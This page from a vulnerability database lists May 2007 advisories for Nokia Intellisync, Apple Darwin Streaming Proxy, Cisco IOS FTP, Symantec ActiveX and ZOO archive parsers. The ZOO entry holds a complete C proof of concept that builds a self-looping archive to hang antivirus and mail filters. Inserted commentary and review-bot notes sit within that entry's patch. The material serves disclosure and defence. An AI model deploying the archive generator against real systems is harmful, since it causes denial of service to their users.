VARIoT IoT vulnerabilities database
| VAR-200705-0288 | CVE-2007-2591 | Nokia Intellisync Mobile Suite usrmgr/userList.asp user account modification vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
usrmgr/userList.asp in Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allows remote attackers to modify user account details and cause a denial of service (account deactivation) via the userid parameter in an update action. Intellisync Mobile Suite is prone to a denial-of-service vulnerability.
----------------------------------------------------------------------
Try a new way to discover vulnerabilities that ALREADY EXIST in your
IT infrastructure.
Join the FREE BETA test of the Network Software Inspector (NSI)!
http://secunia.com/network_software_inspector/
The NSI enables you to INSPECT, DISCOVER, and DOCUMENT
vulnerabilities in more than 4,000 different Windows applications.
----------------------------------------------------------------------
TITLE:
Nokia Intellisync Mobile Suite Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA25212
VERIFY ADVISORY:
http://secunia.com/advisories/25212/
CRITICAL:
Moderately critical
IMPACT:
Cross Site Scripting, Exposure of system information, Exposure of
sensitive information, DoS
WHERE:
From remote
SOFTWARE:
Intellisync Mobile Suite
http://secunia.com/product/3450/
DESCRIPTION:
Johannes Greil has reported some vulnerabilities in Nokia's
Intellisync Mobile Suite, which can be exploited by malicious people
to gain knowledge of sensitive information, conduct cross-site
scripting attacks, manipulate certain data, or cause a DoS (Denial of
Service).
1) Missing authentication checks within certain ASP scripts (e.g.
userList.asp, userStatusList.asp) can be exploited to modify or gain
knowledge of certain user details, or to disable user accounts.
2) Certain input passed to de/pda/dev_logon.asp,
usrmgr/registerAccount.asp, and de/create_account.asp is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
3) An error within the bundled Apache Tomcat server can be exploited
to disclose directory listings and script source codes.
The vulnerabilities are reported in versions 6.4.31.2, 6.6.0.107, and
6.6.2.2 and are reported to partially affect Nokia Intellisync Wireless
Email Express. Other versions may also be affected.
SOLUTION:
Upgrade to GMS 2.
PROVIDED AND/OR DISCOVERED BY:
Johannes Greil, SEC Consult
ORIGINAL ADVISORY:
http://www.sec-consult.com/289.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200705-0148 | CVE-2007-0749 | Apple Darwin Streaming Proxy is_command function stack-based buffer overflow vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Multiple stack-based buffer overflows in the is_command function in proxy.c in Apple Darwin Streaming Proxy, when using Darwin Streaming Server before 5.5.5, allow remote attackers to execute arbitrary code via a long (1) cmd or (2) server value in an RTSP request.
An attacker can exploit these issues to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial of service.
These issues affect versions prior to 5.5.5.
SOLUTION:
Update to version 5.5.5.
http://developer.apple.com/opensource/server/streaming/index.html
PROVIDED AND/OR DISCOVERED BY:
An anonymous person, reported via iDefense Labs.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305495
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=533
Apple Darwin Streaming Proxy Multiple Vulnerabilities
iDefense Security Advisory 05.10.07
http://labs.idefense.com/intelligence/vulnerabilities/
May 10, 2007
I. BACKGROUND
Darwin Streaming Server is a server technology that facilitates
streaming of QuickTime data to clients across the Internet using the
industry standard RTP and RTSP protocols.
The Darwin Streaming Proxy is an application-specific proxy which would
normally be run in a border zone or perimeter network. It is used to
give client machines, within a protected network, access to streaming
servers where the firewall blocks RTSP connections or RTP/UDP data
flow. For more information, please visit the product website at the
following URL.
http://developer.apple.com/opensource/server/streaming/index.html
II. DESCRIPTION
Due to insufficient sanity checking, a stack-based buffer overflow could
occur while trying to extract commands from the request buffer. The
"is_command" function, located in proxy.c, lacks bounds checking when
filling the 'cmd' and 'server' buffers.
Additionally, a heap-based buffer overflow could occur while processing
the "trackID" values contained within a "SETUP" request. If a request
with more than 32 values is encountered, memory corruption will occur.
III. ANALYSIS
No credentials are required for accessing the vulnerable code.
The stack-based buffer overflow vulnerability relies on compiler
optimizations. iDefense has verified the Darwin Streaming Proxy 4.1
binary release for Fedora Core is not vulnerable. The binary produced
from an out-of-the-box compile on Fedora was confirmed vulnerable.
IV. DETECTION
iDefense has confirmed the existence of these vulnerabilities in Darwin
Streaming Server 5.5.4 and Darwin Streaming Proxy 4.1.
V. WORKAROUND
Employ firewalls, access control lists or other TCP/UDP restriction
mechanisms to limit access to vulnerable systems and services.
VI. VENDOR RESPONSE
Apple has addressed this vulnerability by releasing version
5.5.5 of Darwin Streaming Server. More information can be found from
Apple's Security Update page or the Darwin Streaming Server advisory
page at the respective URLs below.
http://docs.info.apple.com/article.html?artnum=61798
http://docs.info.apple.com/article.html?artnum=305495
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
names CVE-2007-0748 to the heap-based buffer overflow and CVE-2007-0749
to the stack-based buffer overflow. These names are candidates for
inclusion in the CVE list (http://cve.mitre.org/), which standardizes
names for security problems.
VIII. DISCLOSURE TIMELINE
04/09/2007 Initial vendor notification
04/09/2007 Initial vendor response
05/10/2007 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-200705-0147 | CVE-2007-0748 | Apple Darwin Streaming Proxy Vulnerable to heap-based buffer overflow |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Heap-based buffer overflow in Apple Darwin Streaming Proxy, when using Darwin Streaming Server before 5.5.5, allows remote attackers to execute arbitrary code via multiple trackID values in a SETUP RTSP request.
An attacker can exploit these issues to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial of service.
These issues affect versions prior to 5.5.5.
SOLUTION:
Update to version 5.5.5.
http://developer.apple.com/opensource/server/streaming/index.html
PROVIDED AND/OR DISCOVERED BY:
An anonymous person, reported via iDefense Labs.
ORIGINAL ADVISORY:
Apple:
http://docs.info.apple.com/article.html?artnum=305495
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=533
| VAR-200705-0283 | CVE-2007-2586 |
Cisco IOS FTP server authentication bypass vulnerability
Related entries in the VARIoT exploits database: VAR-E-200705-0357 |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The FTP Server in Cisco IOS 11.3 through 12.4 does not properly check user authorization, which allows remote attackers to execute arbitrary code, and have other impact including reading startup-config, as demonstrated by a crafted MKD command that involves access to a VTY device and overflows a buffer, aka bug ID CSCek55259. Cisco IOS FTP Server is prone to multiple vulnerabilities including a denial-of-service issue and an authentication-bypass issue.
Attackers can exploit these issues to deny service to legitimate users, gain unauthorized access to an affected device, or execute arbitrary code.
Only IOS devices that have the FTP Server feature enabled are vulnerable; this feature is disabled by default. Cisco IOS is the operating system used by Cisco networking equipment.
TITLE:
Cisco IOS FTP Server Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA25199
VERIFY ADVISORY:
http://secunia.com/advisories/25199/
CRITICAL:
Moderately critical
IMPACT:
Security Bypass, DoS, System access
WHERE:
From remote
OPERATING SYSTEM:
Cisco IOS 12.x
http://secunia.com/product/182/
Cisco IOS 11.x
http://secunia.com/product/183/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco IOS, which can be
exploited by malicious users and malicious people to bypass certain
security restrictions, cause a DoS (Denial of Service), or
potentially compromise a vulnerable system.
1) An unspecified error exists in the IOS FTP server when verifying
user credentials, which can be exploited to bypass user
authentication.
2) An unspecified error exists when transferring files via FTP, which
can be exploited to cause a DoS (Denial of Service).
Successful exploitation may allow an attacker to retrieve any file
from an affected system (including startup-config), cause IOS to
reload, and potentially execute arbitrary code, but requires that the
FTP server is enabled, which is not the default setting.
SOLUTION:
The vendor has issued an update that removes the FTP server ability.
As a workaround, it is possible to disable the FTP server by
executing the following command in configuration mode: "no ftp-server
enable". See vendor advisories for more details.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a00808399ea.html
http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml
| VAR-200705-0289 | CVE-2007-2592 | Nokia Intellisync Mobile Suite Cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Multiple cross-site scripting (XSS) vulnerabilities in Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter to de/pda/dev_logon.asp and (2) multiple unspecified vectors in (a) usrmgr/registerAccount.asp, (b) de/create_account.asp, and other files. Reports indicate that these issues reside only in the bundled package; Nokia Intellisync Mobile Suite may not be affected on its own.
Successful attacks may allow an attacker to obtain sensitive information and carry out denial-of-service and cross-site scripting attacks.
| VAR-200705-0001 | CVE-2006-3456 | Symantec NAVOPTS.DLL ActiveX control (as used in Norton AntiVirus and other products) control crash vulnerability |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
The Symantec NAVOPTS.DLL ActiveX control (aka Symantec.Norton.AntiVirus.NAVOptions) 12.2.0.13, as used in Norton AntiVirus, Internet Security, and System Works 2005 and 2006, is designed for use only in application-embedded web browsers, which allows remote attackers to "crash the control" via unspecified vectors related to content on a web site, and place Internet Explorer into a "defunct state" in which remote attackers can execute arbitrary code in addition to other Symantec ActiveX controls, regardless of whether they are marked safe for scripting. NOTE: this CVE was inadvertently used for an E-mail Auto-Protect issue, but that issue has been assigned CVE-2007-3771. In other words, a third party can (1) crash the control, and (2) execute arbitrary code through other Symantec ActiveX controls once Internet Explorer is in the "defunct state", regardless of whether those controls are marked safe for scripting.
An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document.
Successful exploits will allow attackers to execute arbitrary code in the context of the user visiting a malicious web page. Failed exploit attempts will likely result in denial-of-service conditions.
Symantec Norton Internet Security 2006 COM Object Security ByPass Vulnerability
iDefense Security Advisory 05.09.07
http://labs.idefense.com/intelligence/vulnerabilities/
May 09, 2007
I. BACKGROUND
Norton Internet Security 2006 is a comprehensive system security suite
that offers protection from spyware, viruses, identity theft, spam, and
malicious network traffic. More information can be found on the vendors
site at the following URL.
http://www.symantec.com/home_homeoffice/products/overview.jsp?pcid=is&pvid=nis2006
II. DESCRIPTION
When this control is
loaded in a standard browser window, it throws an error during
initialization which leaves the browser in a defunct state. After the
error dialog displays, other Symantec ActiveX Controls can be created
without error even if they are not marked as safe for scripting. This
can lead to remote code execution if the unsafe controls contain
exploitable methods.
III. ANALYSIS
IV. DETECTION
iDefense confirmed the existence of this vulnerability within version
12.2.0.13 of NavOpts.dll as distributed with Norton Internet Security
2006. Prior versions are suspected to be vulnerable.
V. WORKAROUND
Although this will prevent potential
exploitation, it may also negatively impact the functionality of the
application.
VI. VENDOR RESPONSE
Symantec has addressed this vulnerability with a software update. The
update is available via their LiveUpdate channels. For more
information, consult their advisory at the following URL.
http://www.symantec.com/avcenter/security/Content/2007.05.09.html
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-3456 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
12/13/2006 Initial vendor notification
12/13/2006 Initial vendor response
05/09/2007 Coordinated public disclosure
IX. CREDIT
This vulnerability was reported to iDefense by Peter Vreugdenhil.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2007 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
This can be exploited to e.g.
SOLUTION:
Set the kill-bit for the affected ActiveX control.
PROVIDED AND/OR DISCOVERED BY:
Discovered by Peter Vreugdenhil and reported via iDefense Labs.
ORIGINAL ADVISORY:
Symantec:
http://www.symantec.com/avcenter/security/Content/2007.05.09.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=529
| VAR-200705-0284 | CVE-2007-2587 |
Cisco IOS FTP server file transfer denial of service (DoS) vulnerability
Related entries in the VARIoT exploits database: VAR-E-200705-0357 |
CVSS V2: 6.3 CVSS V3: - Severity: MEDIUM |
The IOS FTP Server in Cisco IOS 11.3 through 12.4 allows remote authenticated users to cause a denial of service (IOS reload) via unspecified vectors involving transferring files (aka bug ID CSCse29244). Cisco IOS FTP Server is prone to multiple vulnerabilities including a denial-of-service issue and an authentication-bypass issue.
Attackers can exploit these issues to deny service to legitimate users, gain unauthorized access to an affected device, or execute arbitrary code.
Only IOS devices that have the FTP Server feature enabled are vulnerable; this feature is disabled by default. Cisco IOS is the operating system used by Cisco networking equipment.
1) An unspecified error exists in the IOS FTP server when verifying
user credentials, which can be exploited to bypass user
authentication.
Successful exploitation may allow an attacker to retrieve any file
from an affected system (including startup-config), cause IOS to
reload, and potentially execute arbitrary code, but requires that the
FTP server is enabled, which is not the default setting.
SOLUTION:
The vendor has issued an update that removes the FTP server ability.
As a workaround, it is possible to disable the FTP server by
executing the following command in configuration mode: "no ftp-server
enable". See vendor advisories for more details.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a00808399ea.html
http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml
| VAR-200705-0187 | CVE-2007-1673 | unzoo.c, as used in AMaViS and other products: denial of service (DoS) vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives.
A successful attack can exhaust system resources and trigger a denial-of-service condition.
This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm.
Topic: Multiple vendors ZOO file decompression infinite loop DoS
Announced: 2007-05-04
Credits: Jean-Sebastien Guay-Leroux
Products: Multiple (see section III)
Impact: DoS (99% CPU utilisation)
CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671,
CVE-2007-1672, CVE-2007-1673
I. BACKGROUND
Zoo is a compression program and format developed by Rahul Dhesi in the mid
1980s. The format is based on the LZW compression algorithm and compressed
files are identified by the .zoo file extension.
II. The vulnerability lies in the algorithm used to locate the files inside
the archive. Each file in a ZOO archive is described by a direntry structure,
and the direntries are chained through a 'next' field. That field is an
absolute offset from the beginning of the archive file to the following
direntry. Nothing requires 'next' to move forward: if it points back at a
direntry that has already been processed (including the current one), the
parser reads that entry again, follows the same 'next' again, and never
reaches the end of the chain. The ZOO parser is thus stuck in an infinite
loop.
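To make the chain-walking defect concrete, here is an added example, written for this page and not code from the advisory or from the zoo project. It builds two small archives in memory using the header and direntry byte offsets from the proof of concept in section VI, then walks the direntry chain twice: once following 'next' blindly, as the vulnerable parsers do, and once with the monotonic-offset rule that the patch in section VII adds. Assumptions not stated on the page: a 'next' of 0 ends the chain, a direntry is read as the 51 bytes the proof of concept writes, and the unpatched walk is capped at MAX_ENTRIES so that it terminates for the demonstration (the real parsers have no cap and spin forever).

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Field offsets taken from the advisory's proof of concept. */
#define ZOO_TAG          0xfdc4a7dcUL
#define ZOO_HEADER_SIZE  0x2a
#define ZH_TAG           20
#define ZH_START_OFFSET  24
#define ZH_NEG_START     28
#define D_TAG            0
#define D_TYPE           4
#define D_NEXT_ENTRY     6
#define D_FILENAME       38
#define D_ENTRY_BYTES    51   /* bytes the proof of concept emits per direntry (assumption) */
#define MAX_ENTRIES      64   /* cap so the unpatched walk terminates here (assumption) */

static void put_u32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

static uint32_t get_u32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Constructed input: a ZOO header followed by n direntries whose 'next'
 * fields come from next_ptrs[]. Returns the archive length, 0 if cap is too small. */
size_t build_archive(unsigned char *buf, size_t cap, const uint32_t *next_ptrs, int n) {
    size_t need = ZOO_HEADER_SIZE + (size_t)n * D_ENTRY_BYTES;
    if (need > cap) return 0;
    memset(buf, 0, need);
    memcpy(buf, "ZOO 2.10 Archive.\032", 18);
    put_u32(buf + ZH_TAG, ZOO_TAG);
    put_u32(buf + ZH_START_OFFSET, ZOO_HEADER_SIZE);
    put_u32(buf + ZH_NEG_START, (uint32_t)0 - ZOO_HEADER_SIZE);
    buf[32] = 2; buf[33] = 0; buf[34] = 1; buf[41] = 3;   /* versions, header type, version data */
    for (int i = 0; i < n; i++) {
        unsigned char *d = buf + ZOO_HEADER_SIZE + (size_t)i * D_ENTRY_BYTES;
        put_u32(d + D_TAG, ZOO_TAG);
        d[D_TYPE] = 1;
        put_u32(d + D_NEXT_ENTRY, next_ptrs[i]);
        memcpy(d + D_FILENAME, "AAAAAAAA.AAA", 13);
    }
    return need;
}

/* Walk the direntry chain. hardened == 0 follows 'next' blindly, as the
 * vulnerable parsers do; hardened != 0 applies the patch's rule that every
 * 'next' must lie beyond the direntry currently being processed.
 * Returns entries visited, -1 if the chain is rejected as corrupt,
 * -2 if MAX_ENTRIES was hit (the stand-in for the infinite loop). */
int walk_chain(const unsigned char *buf, size_t len, int hardened) {
    if (len < ZOO_HEADER_SIZE || get_u32(buf + ZH_TAG) != ZOO_TAG) return -1;
    uint32_t pos = get_u32(buf + ZH_START_OFFSET);   /* zoo_start */
    int visited = 0;
    while (pos != 0) {                               /* next == 0 ends the chain (assumption) */
        if ((size_t)pos + D_ENTRY_BYTES > len) return -1;   /* entry would run past EOF */
        if (get_u32(buf + pos + D_TAG) != ZOO_TAG) return -1;
        if (++visited > MAX_ENTRIES) return -2;
        uint32_t next = get_u32(buf + pos + D_NEXT_ENTRY);
        /* The patch's check: a 'next' at or before the current entry would
         * revisit already processed data, so the chain is corrupt. */
        if (hardened && next != 0 && next <= pos) return -1;
        pos = next;
    }
    return visited;
}

/* The proof of concept's archive: one direntry whose 'next' is its own offset. */
int demo_self_loop(int hardened) {
    unsigned char buf[256];
    const uint32_t next[1] = { ZOO_HEADER_SIZE };
    size_t n = build_archive(buf, sizeof buf, next, 1);
    return walk_chain(buf, n, hardened);
}

/* A well-formed two-entry chain, to show the check does not reject valid input. */
int demo_good_chain(int hardened) {
    unsigned char buf[256];
    const uint32_t next[2] = { ZOO_HEADER_SIZE + D_ENTRY_BYTES, 0 };
    size_t n = build_archive(buf, sizeof buf, next, 2);
    return walk_chain(buf, n, hardened);
}

int main(void) {
    printf("self-loop, unpatched:  %d (-2 = loop cap hit)\n", demo_self_loop(0));
    printf("self-loop, patched:    %d (-1 = rejected as corrupt)\n", demo_self_loop(1));
    printf("good chain, unpatched: %d entries\n", demo_good_chain(0));
    printf("good chain, patched:   %d entries\n", demo_good_chain(1));
    return 0;
}
```

The check is the same one the section VII patch inserts before each seek: compare the offset about to be followed with the one just processed and treat "not strictly greater" as corruption. It costs one comparison per entry and rejects the proof-of-concept archive on its first direntry, while a forward-only chain is walked unchanged.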
III. AFFECTED SOFTWARE
o Barracuda Spam Firewall
o Panda Software Antivirus
o avast! antivirus
o Avira AntiVir
o zoo-2.10
o unzoo.c
o WinAce
o PicoZip
IV. IMPACT
If this attack is conducted against a vulnerable antivirus, the host system
will have its CPU at 100% utilization and may have problems answering other
requests.
If this attack is conducted against an SMTP content filter running a
vulnerable ZOO implementation, legitimate clients may be unable to send and
receive email through this server.
V. SOLUTION
o Barracuda Spam Firewall - CVE-2007-1669:
They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and
2.0.6399o for firmware < 3.4 March 19th 2007.
o Panda Software Antivirus - CVE-2007-1670:
They fixed this problem April 2nd 2007.
o avast! antivirus - CVE-2007-1672:
They fixed this problem in version 4.7.981, April 14th 2007.
o Avira AntiVir - CVE-2007-1671:
They fixed this problem in avpack32.dll version 7.3.0.6 March 22nd 2007.
o zoo-2.10 - CVE-2007-1669:
This software is not maintained anymore. A patch for version 2.10 is
provided in section VII of this advisory because some SMTP content
filters may still use this software.
o unzoo.c - CVE-2007-1673:
This software is not maintained anymore. No patch is provided for this
software.
o WinAce was contacted but no response was received from them.
o PicoZip was contacted but no response was received from them.
VI. PROOF OF CONCEPT
Using the PIRANA framework version 0.3.3, available at
http://www.guay-leroux.com, it is possible to test your SMTP server
against this vulnerability.
Alternatively, here is an exploit that will create a file that will trigger
the infinite loop condition when it is processed.
/*
Exploit for the vulnerability:
Multiple vendors ZOO file decompression infinite loop DoS
coded by Jean-Sébastien Guay-Leroux
September 2006
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Byte offsets of the fields in a ZOO archive header
#define ZOO_HEADER_SIZE 0x0000002a
#define ZH_TEXT 0
#define ZH_TAG 20
#define ZH_START_OFFSET 24
#define ZH_NEG_START_OFFSET 28
#define ZH_MAJ_VER 32
#define ZH_MIN_VER 33
#define ZH_ARC_HTYPE 34
#define ZH_ARC_COMMENT 35
#define ZH_ARC_COMMENT_LENGTH 39
#define ZH_VERSION_DATA 41

// Byte offsets of the fields in a direntry structure
#define D_DIRENTRY_LENGTH 56
#define D_TAG 0
#define D_TYPE 4
#define D_PACKING_METHOD 5
#define D_NEXT_ENTRY 6
#define D_OFFSET 10
#define D_DATE 14
#define D_TIME 16
#define D_FILE_CRC 18
#define D_ORIGINAL_SIZE 20
#define D_SIZE_NOW 24
#define D_MAJ_VER 28
#define D_MIN_VER 29
#define D_DELETED 30
#define D_FILE_STRUCT 31
#define D_COMMENT_OFFSET 32
#define D_COMMENT_SIZE 36
#define D_FILENAME 38
#define D_VAR_DIR_LEN 51
#define D_TIMEZONE 53
#define D_DIR_CRC 54
#define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )
#define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )
#define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )

// Little-endian writers for the fixed-width fields
void put_byte (char *ptr, unsigned char data) {
    *ptr = data;
}

void put_word (char *ptr, unsigned short data) {
    put_byte (ptr, data);
    put_byte (ptr + 1, data >> 8);
}

void put_longword (char *ptr, unsigned long data) {
    put_byte (ptr, data);
    put_byte (ptr + 1, data >> 8);
    put_byte (ptr + 2, data >> 16);
    put_byte (ptr + 3, data >> 24);
}

FILE * open_file (char *filename) {
    FILE *fp;
    fp = fopen (filename, "wb");   // binary mode: the archive is raw bytes
    if (!fp) {
        perror ("Cant open file");
        exit (1);
    }
    return fp;
}

void usage (char *progname) {
    printf ("\nTo use:\n");
    printf ("%s <archive name>\n\n", progname);
    exit (1);
}

int main (int argc, char *argv[]) {
    FILE *fp;
    char *hdr = (char *) malloc (4096);
    char *filename = (char *) malloc (256);
    size_t written_bytes;
    int total_size;

    if (argc != 2) {
        usage (argv[0]);
    }
    // Check the allocations before touching them
    if (!hdr || !filename) {
        perror ("Error allocating memory");
        exit (1);
    }
    strncpy (filename, argv[1], 255);
    filename[255] = '\0';          // strncpy does not terminate a 255+ byte name
    memset (hdr, 0x00, 4096);

    // Build a ZOO header
    memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
    put_longword (hdr + ZH_TAG, 0xfdc4a7dc);
    put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
    put_longword (hdr + ZH_NEG_START_OFFSET, (ZOO_HEADER_SIZE) * -1);
    put_byte (hdr + ZH_MAJ_VER, 2);
    put_byte (hdr + ZH_MIN_VER, 0);
    put_byte (hdr + ZH_ARC_HTYPE, 1);
    put_longword (hdr + ZH_ARC_COMMENT, 0);
    put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0);
    put_byte (hdr + ZH_VERSION_DATA, 3);

    // Build the vulnerable direntry struct, placed right after the header
    // (offset 0x2a). Its 'next' field is also 0x2a, i.e. its own offset, so
    // a parser that follows 'next' without checking it re-reads this same
    // entry forever.
    put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
    put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
    put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
    put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
    put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
    put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
    put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
    put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
    put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
    put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
    put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
    put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
    put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
    put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
    put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
    put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
    memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME, "AAAAAAAA.AAA", 13);

    // Header plus the fixed part of one direntry, up to and including the
    // short filename; the variable-length tail is not needed to trigger the bug
    total_size = ZOO_HEADER_SIZE + 51;

    fp = open_file (filename);
    written_bytes = fwrite (hdr, 1, total_size, fp);
    if (written_bytes == (size_t) total_size) {
        printf ("The file has been written\n");
    } else {
        printf ("Cant write to the file\n");
        fclose (fp);
        exit (1);
    }
    fclose (fp);
    free (hdr);
    free (filename);
    return 0;
}
VII. PATCH
To fix this issue, ensure that the offset of the next file to process is
always greater than the one you are currently processing. This will
guarantee the fact that it's not possible to process the same files over
and over again. Here is a patch for the software zoo version 2.10
distributed with many UNIX systems:
diff -u zoo/zooext.c zoo-patched/zooext.c
--- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400
+++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500
@@ -89,6 +89,7 @@
#endif
struct direntry direntry; /* directory entry */
int first_dir = 1;
/* first dir entry seen? */
+unsigned long zoo_pointer = 0; /* Track our position
in the file */
static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n";
static char no_space[] = "Insufficient disk space to extract %s.\n";
@@ -169,6 +170,9 @@
exit_status = 1;
}
zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data
begins */
+
+ /* Begin tracking our position in the file */
+ zoo_pointer = zoo_header.zoo_start;
}
#ifndef PORTABLE
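Review bot: zoo_pointer is set to zoo_header.zoo_start right after a zooseek whose return value is not checked (the line above the added block), so if that seek fails the tracked position and the real file position disagree from the first direntry on. The zoolist.c hunk for the same spot tests zooseek's result; do the same here and assign zoo_pointer only on success.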
@@ -597,6 +601,12 @@
} /* end if */
loop_again:
+
+ /* Make sure we are not seeking to already processed data */
+ if (next_ptr <= zoo_pointer)
+ prterror ('f', "ZOO chain structure is corrupted\n");
+ zoo_pointer = next_ptr;
+
zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */
} /* end while */
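Review bot: the comparison `if (next_ptr <= zoo_pointer)` also fires for next_ptr == 0, and the hunk does not show how the while loop terminates; if the parser uses a zero next offset as the end-of-chain marker and tests for it only after loop_again, every well-formed archive would now die with "ZOO chain structure is corrupted". Confirm that the end-of-chain exit comes before this check, or exclude zero explicitly: `if (next_ptr != 0 && next_ptr <= zoo_pointer)`.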
diff -u zoo/zoolist.c zoo-patched/zoolist.c
